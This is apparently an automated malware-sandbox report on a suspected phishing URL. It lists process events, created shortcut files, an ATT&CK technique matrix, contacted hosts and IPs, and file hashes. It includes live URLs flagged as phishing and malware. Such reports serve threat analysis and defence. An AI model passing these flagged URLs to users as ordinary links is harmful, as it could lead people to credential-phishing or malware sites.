      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Obfuscated Files or Information
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://heuristic-knuth-588d37.netlify.app/?naps/100%Avira URL Cloudphishing
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://essentialhandymanservices.com/wp/next.php100%Avira URL Cloudmalware
      http://www.xay.io/track.php?domain=xay.io&toggle=browserjs&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D0%Avira URL Cloudsafe
      http://www.xay.io/track.php?domain=xay.io&caf=1&toggle=answercheck&answer=yes&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D0%Avira URL Cloudsafe
      http://www.xay.io/favicon.ico0%Avira URL Cloudsafe
      http://www.xay.io/ls.php?t=67830dce&token=81c92fd1c3d837096544712dee4879b2447b28ba0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      stackpath.bootstrapcdn.com
      104.18.11.207
      truefalse
        high
        obseu.netgreencolumn.com
        3.248.162.96
        truefalse
          high
          heuristic-knuth-588d37.netlify.app
          3.125.36.175
          truetrue
            unknown
            syndicatedsearch.goog
            172.217.16.206
            truefalse
              high
              www.google.com
              172.217.18.4
              truefalse
                high
                kr1-nid.naver.com.nfront.nheos.com
                110.93.159.46
                truefalse
                  unknown
                  www.xay.io
                  75.2.115.196
                  truetrue
                    unknown
                    euob.netgreencolumn.com
                    52.222.236.17
                    truefalse
                      high
                      googlehosted.l.googleusercontent.com
                      142.250.185.65
                      truefalse
                        high
                        d38psrni17bvxu.cloudfront.net
                        18.66.121.135
                        truefalse
                          high
                          ipv4.imgur.map.fastly.net
                          199.232.196.193
                          truefalse
                            high
                            www.dynadot.com
                            104.16.152.132
                            truefalse
                              high
                              afs.googleusercontent.com
                              unknown
                              unknownfalse
                                high
                                i.imgur.com
                                unknown
                                unknownfalse
                                  high
                                  essentialhandymanservices.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    nid.naver.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://www.google.com/adsense/domains/caf.js?abp=1&adsdeli=truefalse
                                        high
                                        http://www.xay.io/privacy.htmlfalse
                                          unknown
                                          http://www.xay.io/true
                                            unknown
                                            https://syndicatedsearch.goog/afs/gen_204?client=dp-teaminternet09_3ph&output=uds_ads_only&zx=lwf3qohhv0j&aqid=0Q2DZ5GwDdGvjuwPrJSBkA4&psid=7840396037&pbt=bv&adbx=366.5&adby=214&adbh=511&adbw=530&adbah=160%2C160%2C160&adbn=master-1&eawp=partner-dp-teaminternet09_3ph&errv=712519386&csala=6%7C0%7C987%7C1235%7C249&lle=0&ifv=1&hpt=1false
                                              high
                                              https://obseu.netgreencolumn.com/monfalse
                                                high
                                                https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                  high
                                                  https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/chevron.svg?c=%23fffffffalse
                                                    high
                                                    http://d38psrni17bvxu.cloudfront.net/themes/cleanPeppermintBlack_657d9013/img/arrows.pngfalse
                                                      high
                                                      https://www.dynadot.com/tr/mainsite2023/navbar-logo-dark-2023.pngfalse
                                                        high
                                                        https://obseu.netgreencolumn.com/tracker/tc_imp.gif?e=37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c219301020932555ac3ed3f1e77be26bb25cb43e29b25f45471ad0f2e6410d25afe5aecd2948a7fe07f52a13ad2a24710d14e681f2d1586d31c64e56ac8bf88b71208fe59f1d329e921c46bcf40e25c7ea8290ee95c400035db386ee683e99332bd06b442c316f0496f70bfc72f02431e24f97999c140ab51258fc6e279126332a5de6c7fd6d5431f2b436f0715a7902c701e56f2ab0b2093aef6298ee35d60013ee9f3e4869265bcd5d759bf079d5d3a63ccea9de6f13599d9b13a93350983f0c82a1e1ea3683aba8c063abbcaf1778807fc4eae965d8013d9c56d9c7c71d69338c722d795f6bbdea6fd4075e93daaa9ae7c433ebdcf71d2e113f01a1813dd405c85d0cd88c0bcdd70ff1b90d0f58838b62f3574937b6bccc2df0e37d7ec74bb11e0830dce37ef33024a5e8c6eff03dfcba874b4822ac419e0cf929b6b8d4d4f68fe481f5e72092687a023fa05d1cfa62aae9969ebbb2a9adaa9b13dc1f0e35f477083ee5252f0b1490242bbacac74e66688e037f2e62eb211bc23c1168d40c5a22ec60426e3ad94603b3e690a23151442d998e82c927cb20030067f83c50acd840a4fbbe18ba8b67ec3f3e5fb85fea9f54a4635f259c4d5212bf40a3b7aac090b3b04910df76405d0af843ade72dd378ab52dcabb0b9f7f0e28290b624df49f9bd9760326f969229d87dbc7c1d84f17dcf0eb6f9ca41e67ca9056657bf391c54475e663d423c049b27bc24d85aa46afe36dbc8982d0845536baa229699f70a68dacb956c13d261c05887a030de4e14d85f112ca9987da1490c595390e2b55e17ef854b85fb29d7bc971107403287762e75a8e9d210afa3c82b5ff35c5dd14da2161a510603eceabc30059ed74f392028344484038e0647fd9f6893fd95d68cbd950f492&cri=S9cmgKYQSv&ts=1155&cb=1736642001047false
                                                          high
                                                          https://syndicatedsearch.goog/afs/gen_204?client=dp-teaminternet09_3ph&output=uds_ads_only&zx=5ufhciitm2l3&aqid=0Q2DZ5GwDdGvjuwPrJSBkA4&psid=7840396037&pbt=bs&adbx=366.5&adby=214&adbh=511&adbw=530&adbah=160%2C160%2C160&adbn=master-1&eawp=partner-dp-teaminternet09_3ph&errv=712519386&csala=6%7C0%7C987%7C1235%7C249&lle=0&ifv=1&hpt=1false
                                                            high
                                                            https://syndicatedsearch.goog/adsense/domains/caf.js?pac=0false
                                                              high
                                                              https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%23fffffffalse
                                                                high
                                                                http://www.xay.io/ls.php?t=67830dce&token=81c92fd1c3d837096544712dee4879b2447b28bafalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://heuristic-knuth-588d37.netlify.app/?naps/true
                                                                  unknown
                                                                  http://www.xay.io/track.php?domain=xay.io&caf=1&toggle=answercheck&answer=yes&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3Dfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://i.imgur.com/g1U1hqo.pngfalse
                                                                    high
                                                                    http://www.xay.io/favicon.icofalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://nid.naver.com/favicon_1024.pngfalse
                                                                      high
                                                                      http://www.xay.io/track.php?domain=xay.io&toggle=browserjs&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3Dfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://syndicatedsearch.googchromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.drfalse
                                                                        high
                                                                        https://essentialhandymanservices.com/wp/next.phpchromecache_103.2.drfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://i.imgur.com/g1U1hqo.png);chromecache_103.2.drfalse
                                                                          high
                                                                          https://getbootstrap.com/)chromecache_108.2.dr, chromecache_95.2.drfalse
                                                                            high
                                                                            https://github.com/twbs/bootstrap/graphs/contributors)chromecache_108.2.dr, chromecache_95.2.drfalse
                                                                              high
                                                                              https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_108.2.dr, chromecache_95.2.drfalse
                                                                                high
                                                                                https://www.google.com/pagead/1p-conversion/16521530460/?gad_source=1&adview_type=5chromecache_86.2.dr, chromecache_96.2.dr, chromecache_111.2.dr, chromecache_81.2.drfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  18.66.121.138
                                                                                  unknownUnited States
                                                                                  3MIT-GATEWAYSUSfalse
                                                                                  142.250.185.100
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  199.232.196.193
                                                                                  ipv4.imgur.map.fastly.netUnited States
                                                                                  54113FASTLYUSfalse
                                                                                  104.16.153.132
                                                                                  unknownUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  75.2.115.196
                                                                                  www.xay.ioUnited States
                                                                                  16509AMAZON-02UStrue
                                                                                  3.248.162.96
                                                                                  obseu.netgreencolumn.comUnited States
                                                                                  16509AMAZON-02USfalse
                                                                                  18.66.121.135
                                                                                  d38psrni17bvxu.cloudfront.netUnited States
                                                                                  3MIT-GATEWAYSUSfalse
                                                                                  54.75.69.192
                                                                                  unknownUnited States
                                                                                  16509AMAZON-02USfalse
                                                                                  142.250.186.33
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  142.250.185.65
                                                                                  googlehosted.l.googleusercontent.comUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  3.125.36.175
                                                                                  heuristic-knuth-588d37.netlify.appUnited States
                                                                                  16509AMAZON-02UStrue
                                                                                  172.217.16.206
                                                                                  syndicatedsearch.googUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  172.217.18.4
                                                                                  www.google.comUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  199.232.192.193
                                                                                  unknownUnited States
                                                                                  54113FASTLYUSfalse
                                                                                  216.58.206.68
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  104.18.11.207
                                                                                  stackpath.bootstrapcdn.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  110.93.159.46
                                                                                  kr1-nid.naver.com.nfront.nheos.comKorea Republic of
                                                                                  23576NHN-AS-KRNBPKRfalse
                                                                                  239.255.255.250
                                                                                  unknownReserved
                                                                                  unknownunknownfalse
                                                                                  52.222.236.17
                                                                                  euob.netgreencolumn.comUnited States
                                                                                  16509AMAZON-02USfalse
                                                                                  125.209.233.21
                                                                                  unknownKorea Republic of
                                                                                  23576NHN-AS-KRNBPKRfalse
                                                                                  104.16.152.132
                                                                                  www.dynadot.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  IP
                                                                                  192.168.2.6
                                                                                  192.168.2.5
                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1589350
                                                                                  Start date and time:2025-01-12 01:31:56 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 3m 6s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:browseurl.jbs
                                                                                  Sample URL:https://heuristic-knuth-588d37.netlify.app/?naps/
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:7
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Detection:MAL
                                                                                  Classification:mal76.phis.win@18/60@59/23
                                                                                  EGA Information:Failed
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 0
                                                                                  • Number of non-executed functions: 0
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.186.142, 142.251.168.84, 142.250.185.110, 142.250.184.206, 216.58.206.46, 142.250.184.234, 142.250.181.234, 172.217.18.10, 142.250.185.106, 142.250.186.42, 216.58.206.42, 142.250.184.202, 142.250.186.106, 172.217.23.106, 172.217.16.138, 142.250.185.170, 142.250.186.138, 142.250.185.202, 142.250.186.74, 216.58.212.138, 142.250.185.234, 142.250.186.170, 199.232.210.172, 192.229.221.95, 142.250.186.110, 216.58.206.78, 142.250.186.66, 216.58.206.34, 142.250.181.238, 142.250.186.46, 142.250.185.163, 142.250.185.206, 184.28.90.27, 4.245.163.56, 13.107.246.45, 52.149.20.212
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, partner.googleadservices.com, ctldl.windowsupdate.com, clientservices.googleapis.com, nid.naver.com.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: https://heuristic-knuth-588d37.netlify.app/?naps/
                                                                                  No simulations
                                                                                  No context
                                                                                  No context
                                                                                  No context
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Jan 11 23:32:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2677
                                                                                  Entropy (8bit):3.981655210251639
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8OdQTUbwsH7idAKZdA19ehwiZUklqeh9y+3:8duwgey
                                                                                  MD5:B12F7DBBB7A4B87882121E6B9CA66F34
                                                                                  SHA1:9DC748E33097FE876D6457FC85DFD01B45941DB9
                                                                                  SHA-256:6F86B3A56154744E57E91425838B304F0A1148031727713876F99094D0534FD3
                                                                                  SHA-512:5A7A124612CF7386B9FF81F31B3B6EE565EF2C5F21DA7CA89395CF18064CBD46F9F0C812125598B19627D859BAFFB3A90E4B63870F4674C0BB59AEF20853EF84
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:L..................F.@.. ...$+.,....s$...d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q._P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Jan 11 23:32:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2679
                                                                                  Entropy (8bit):3.997122571260845
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8CdQTUbwsH7idAKZdA1weh/iZUkAQkqehOy+2:85uwa9Qry
                                                                                  MD5:75B746EF8D6F0A44EB0F7146D514E892
                                                                                  SHA1:5B93945B2E7E76C61255BA8FC4C327B326A34EC3
                                                                                  SHA-256:91CDC61031562EEA42914B284A7229AAB8B24DD012556715C3A9CCBDD7CAD07C
                                                                                  SHA-512:79EA2DBEA813688F0EE638765E78605E8FAFBF336EB235759815F53501D587F69D15DD8E9651C907714D9772E75A780D4E7258BCBA72CD18C27EE360F87600A3
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:L..................F.@.. ...$+.,.....8|..d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q._P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2693
                                                                                  Entropy (8bit):4.008311167177243
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8xVdQTUbwsH7idAKZdA14tseh7sFiZUkmgqeh7ssy+BX:8xIuwCnKy
                                                                                  MD5:AF15BA77E6F883996151B6A818F19010
                                                                                  SHA1:446F0A9768D1F5BBDF961C29A457F9CE0C9367D2
                                                                                  SHA-256:8C927A0791D080FC4E03606C6536697747E0DB1012E64AAF161FDE823A518C19
                                                                                  SHA-512:848CCB1FB738F942B28BC8A11772D1FA7F70CB4D8E59D1A910730FF68042F4E932221BADC5942AE317A5DAF26A83F52901010BB4A936B20D177CC7189DA2A4FC
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q._P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Jan 11 23:32:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2681
                                                                                  Entropy (8bit):3.9939716752074825
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8hdQTUbwsH7idAKZdA1vehDiZUkwqehiy+R:8suwBky
                                                                                  MD5:447713C6DAB561962483621158C4E331
                                                                                  SHA1:677C0F9A3576B16C44E5DC98473775914711FB82
                                                                                  SHA-256:288D0B2F0622D7AC21D88EF160B602DCECA02B46289F1EC6E5F4C9733C0FD6A5
                                                                                  SHA-512:9C44A7C1B67CBB59EF3FD749D57F4EF9E5684848235041C37653E2CBC0C9C5052920E05A7EA2E5E06189B18AD7876D833955B222413499FA2EEF478049793F9D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:L..................F.@.. ...$+.,....P.u..d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I,Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V,Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V,Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V,Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........q._P.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Jan 11 23:32:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2681
                                                                                  Entropy (8bit):3.986024667362229
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8xdQTUbwsH7idAKZdA1hehBiZUk1W1qehYy+C:88uwB94y
                                                                                  MD5:750DD25987F801BD3E49A787CB1CD3DA
                                                                                  SHA1:617021EF1394D6873D9BC272DD280A983C77D4E3
                                                                                  SHA-256:0C4C03C8E206E2049C2D391A41A2361E53FABA6B713842B44CC8E6E3A9E8AD71
                                                                                  SHA-512:B7D6D22F6486687B780E293F16F13D85EA054D25D63A76905933E9C8375F332D74D232B3801AB0469F657B82481E3D51508788D01B4F78ED2D16FC8F35DBC5BA
                                                                                  Malicious:false
                                                                                  Reputation:low
